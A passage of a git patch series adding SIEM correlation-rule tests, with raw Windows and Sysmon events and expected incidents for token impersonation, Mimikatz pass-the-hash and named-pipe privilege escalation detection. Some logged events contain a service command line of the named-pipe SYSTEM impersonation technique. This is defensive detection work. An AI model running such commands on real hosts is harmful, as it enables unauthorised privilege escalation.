,\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"},{\"Name\":\"ImpersonationLevel\",\"text\":\"%%1833\"},{\"Name\":\"RestrictedAdminMode\",\"text\":\"-\"},{\"Name\":\"TargetOutboundUserName\",\"text\":\"-\"},{\"Name\":\"TargetOutboundDomainName\",\"text\":\"-\"},{\"Name\":\"VirtualAccount\",\"text\":\"%%1843\"},{\"Name\":\"TargetLinkedLogonId\",\"text\":\"0x0\"},{\"Name\":\"ElevatedToken\",\"text\":\"%%1842\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "chain_id": "c5412e82-8bc5-0000-0a2f-41c5c58bd601", "datafield6": "Network", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.773Z", "src.host": "msedgewin10", "src.hostname": "msedgewin10", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "829ce377-a5ed-431e-b00b-142f8a299ee5"} +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4648\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-15T18:04:39.9870522Z\"},\"EventRecordID\":\"161472\",\"Correlation\":{\"ActivityID\":\"{c5412e82-8bc5-0000-0a2f-41c5c58bd601}\"},\"Execution\":{\"ProcessID\":\"644\",\"ThreadID\":\"5436\"},\"Channel\":\"Security\",\"Computer\":\"localhist\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1009\"},{\"Name\":\"SubjectUserName\",\"text\":\"svc01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x10b6b3\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetLogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TargetServerName\",\"text\":\"localhist\"},{\"Name\":\"TargetInfo\",\"text\":\"localhist\"},{\"Name\":\"ProcessId\",\"text\":\"0x140c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\"},{\"Name\":\"IpAddress\",\"text\":\"-\"},{\"Name\":\"IpPort\",\"text\":\"-\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield6": "00000000-0000-0000-0000-000000000000", "datafield8": "00000000-0000-0000-0000-000000000000", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4648_A_logon_was_attempted_using_explicit_credentials", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4648", "normalized": true, "object": "account", "object.account.domain": "msedgewin10", "object.account.name": "ieuser", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T10:55:20.776Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-15T18:04:39.987Z", "type": "raw", "uuid": "1a7d57e9-6488-4c0d-aca8-b2ac3e619852"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "elevate", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Token Impersonation/Theft", "correlation_name": "CreateProcessAsUser_Impersonation", "correlation_type": "incident", "datafield9": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", "dst.host": "localhist", "dst.hostname": "localhist", "event_src.category": "AAA", "event_src.fqdn": "localhist", "event_src.host": "localhist", "event_src.hostname": "localhist", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "CreateProcessAsUser_Impersonation|localhist|svc01|5132|ieuser", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": "remote", "logon_service": "Advapi", "logon_type": 3, "object": "account", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.account.name": "ieuser", "object.account.session_id": "2273185", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1009", "subject.account.name": "svc01", "subject.account.privileges": "local administrator rights", "subject.account.session_id": "1095347", "subject.process.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "subject.process.id": "5132", "subject.process.name": "w3wp.exe", "subject.process.path": "c:\\windows\\system32\\inetsrv\\"} From 59a4d1e1975f7046a5505e8cb222e27db53b97ce Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:24:39 +0300 Subject: [PATCH 48/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5FPass=5Fthe=5FHash=5Fvia=5FMimikatz=5Flocal)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc index c7d2d553..c75eecdf 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Detect_Pass_the_Hash_via_Mimikatz_local/tests/test_1.sc @@ -2,4 +2,5 @@ {"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-18T11:06:29.9115792Z\"},\"EventRecordID\":\"432904\",\"Correlation\":{\"ActivityID\":\"{661f2d37-d535-43f5-bae0-06be7e6614d7}\"},\"Execution\":{\"ProcessID\":\"524\",\"ThreadID\":\"2884\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4530f0f\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "pc01.example.corp", "dst.host": "pc01.example.corp", "dst.hostname": "pc01", "event_src.category": "AAA", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "example", "object.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "object.account.name": "user01", "object.account.privileges": "SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege", "object.account.session_id": "72552207", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T15:35:33.889Z", "src.fqdn": "pc01.example.corp", "src.host": "pc01.example.corp", "src.hostname": "pc01", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "72552207", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-18T11:06:29.911Z", "type": "raw", "uuid": "f9da3da2-ede6-44b8-9983-503a25f2b719"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Detect_Pass_the_Hash_via_Mimikatz_local"} +expect 1 {"action": "elevate", "alert.key": "pc01.example.corp|user01|user01", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Access Token Manipulation: Make and Impersonate Token", "correlation_name": "Detect_Pass_the_Hash_via_Mimikatz_local", "correlation_type": "incident", "dst.fqdn": "pc01.example.corp", "dst.host": "pc01.example.corp", "dst.hostname": "pc01", "event_src.category": "AAA", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_Pass_the_Hash_via_Mimikatz_local|pc01.example.corp|user01|user01", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "logon_service": "seclogo", "logon_type": 9, "object": "account", "object.account.domain": "example", "object.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "object.account.name": "user01", "object.account.privileges": "SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege", "object.account.session_id": "72552207", "src.fqdn": "pc01.example.corp", "src.host": "pc01.example.corp", "src.hostname": "pc01", "src.ip": "::1", "src.port": 0, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "72552207", "subject.process.fullpath": "c:\\windows\\system32\\svchost.exe", "subject.process.id": "1004", "subject.process.name": "svchost.exe", "subject.process.path": "c:\\windows\\system32\\"} + \ No newline at end of file From b4f69509a09b4c062183e9e66e3de4a570b65222 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:30:05 +0300 Subject: [PATCH 49/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(=20Named?= =?UTF-8?q?=5FPipe=5FImpersonation=5FPrivEsc)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc | 6 ++++++ .../Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc | 6 ++++++ .../Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc | 6 ++++++ 3 files changed, 18 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc new file mode 100644 index 00000000..df51014c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_1.sc @@ -0,0 +1,6 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2700764Z\"},\"EventRecordID\":\"90359678\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"9264\",\"ThreadID\":\"4564\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 10:24:33.267\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\fkkgxm\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "fkkgxm", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.267Z", "type": "raw", "uuid": "4a75c38e-8783-4ca0-95b7-6b9ed3a0788e"} +{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2963447Z\"},\"EventRecordID\":\"90359686\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"9264\",\"ThreadID\":\"4564\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 10:24:33.283\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab61-6464-5811-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"10720\"},{\"Name\":\"PipeName\",\"text\":\"\\\\fkkgxm\"},{\"Name\":\"Image\",\"text\":\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_18_Pipe_connected", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "18", "normalized": true, "object": "resource", "object.name": "fkkgxm", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\cmd.exe", "subject.process.guid": "b56fc2d9-ab61-6464-5811-000000005e00", "subject.process.id": "10720", "subject.process.name": "cmd.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.283Z", "type": "raw", "uuid": "b05c5d49-e31c-4f96-bf5e-c3212935df6b"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Service Control Manager\",\"Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"Qualifiers\":\"16384\",\"text\":\"7045\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x8080000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T10:24:33.2678382Z\"},\"EventRecordID\":\"117960\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"660\",\"ThreadID\":\"6052\"},\"Channel\":\"System\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-21-1129291328-2819992169-918366777-1113\"}},\"EventData\":{\"Data\":[{\"Name\":\"ServiceName\",\"text\":\"fkkgxm\"},{\"Name\":\"ImagePath\",\"text\":\"cmd.exe /c echo fkkgxm >\\\\\\\\.\\\\pipe\\\\fkkgxm\"},{\"Name\":\"ServiceType\",\"text\":\"user mode service\"},{\"Name\":\"StartType\",\"text\":\"demand start\"},{\"Name\":\"AccountName\",\"text\":\"LocalSystem\"}]}}}", "category.generic": "Service", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.subsys": "System", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_7045_New_Windows_Service", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7045", "normalized": true, "object": "service", "object.account.name": "localsystem", "object.name": "fkkgxm", "object.process.cmdline": "cmd.exe /c echo fkkgxm >\\\\.\\pipe\\fkkgxm", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:30:38.123Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T10:24:33.267Z", "type": "raw", "uuid": "2c08367a-9497-4256-b3eb-95edf32d130a"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "escalate", "alert.context": "yfomina -> system", "alert.key": "c:\\users\\yfomina\\downloads\\installer.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Token Impersonation/Theft", "correlation_name": "Named_Pipe_Impersonation_PrivEsc", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "object": "session", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.name": "fkkgxm", "object.property": "start type", "object.type": "user mode service", "object.value": "demand start", "reason": "Named Pipe Impersonation (In Memory/Admin)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc new file mode 100644 index 00000000..4510ffa4 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/Named_Pipe_Impersonation_PrivEsc/tests/test_2.sc @@ -0,0 +1,6 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"17\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"17\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.7662329Z\"},\"EventRecordID\":\"90395131\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"CreatePipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:07:45.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-ab37-6464-5711-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"5852\"},{\"Name\":\"PipeName\",\"text\":\"\\\\pdxxuf\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\yfomina\\\\Downloads\\\\installer.exe\"},{\"Name\":\"User\",\"text\":\"TESTLAB\\\\yfomina\"}]}}}", "event_src.category": "Other", "event_src.fqdn": "win10x64-133.testlab.esc", "event_src.host": "win10x64-133.testlab.esc", "event_src.hostname": "win10x64-133", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_17_Pipe_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "17", "normalized": true, "object": "resource", "object.name": "pdxxuf", "object.type": "pipe", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-20T11:57:31.328Z", "status": "success", "subject": "process", "subject.account.domain": "testlab", "subject.account.id": "synthetic:yfomina@testlab", "subject.account.name": "yfomina", "subject.process.fullpath": "c:\\users\\yfomina\\downloads\\installer.exe", "subject.process.guid": "b56fc2d9-ab37-6464-5711-000000005e00", "subject.process.id": "5852", "subject.process.name": "installer.exe", "subject.process.path": "c:\\users\\yfomina\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-17T12:07:45.760Z", "type": "raw", "uuid": "1355e6e8-8fba-4e4c-afc0-1a0828b0ae2b"} +{"action": "bind", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"18\",\"Version\":\"1\",\"Level\":\"4\",\"Task\":\"18\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-17T12:07:45.9872895Z\"},\"EventRecordID\":\"90395139\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4200\",\"ThreadID\":\"13908\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-133.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"EventType\",\"text\":\"ConnectPipe\"},{\"Name\":\"UtcTime\",\"text\":\"2023-05-17 12:07:45.979\"},{\"Name\":\"ProcessGuid\",\"text\":\"{b56fc2d9-c391-6464-1412-000000005e00}\"},{\"Name\":\"ProcessId\",\"text\":\"13856\"},{\"Name\":\"PipeName\",\"text\":\"\\\\pdxxuf\"},{\"Name\":\"Image\",\"text\":\"C:\\\\WINDOWS\\\\system32\\\\rundll32.exe\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"}]}}}", "event_src.category": "Other", "event_src.fqdn": 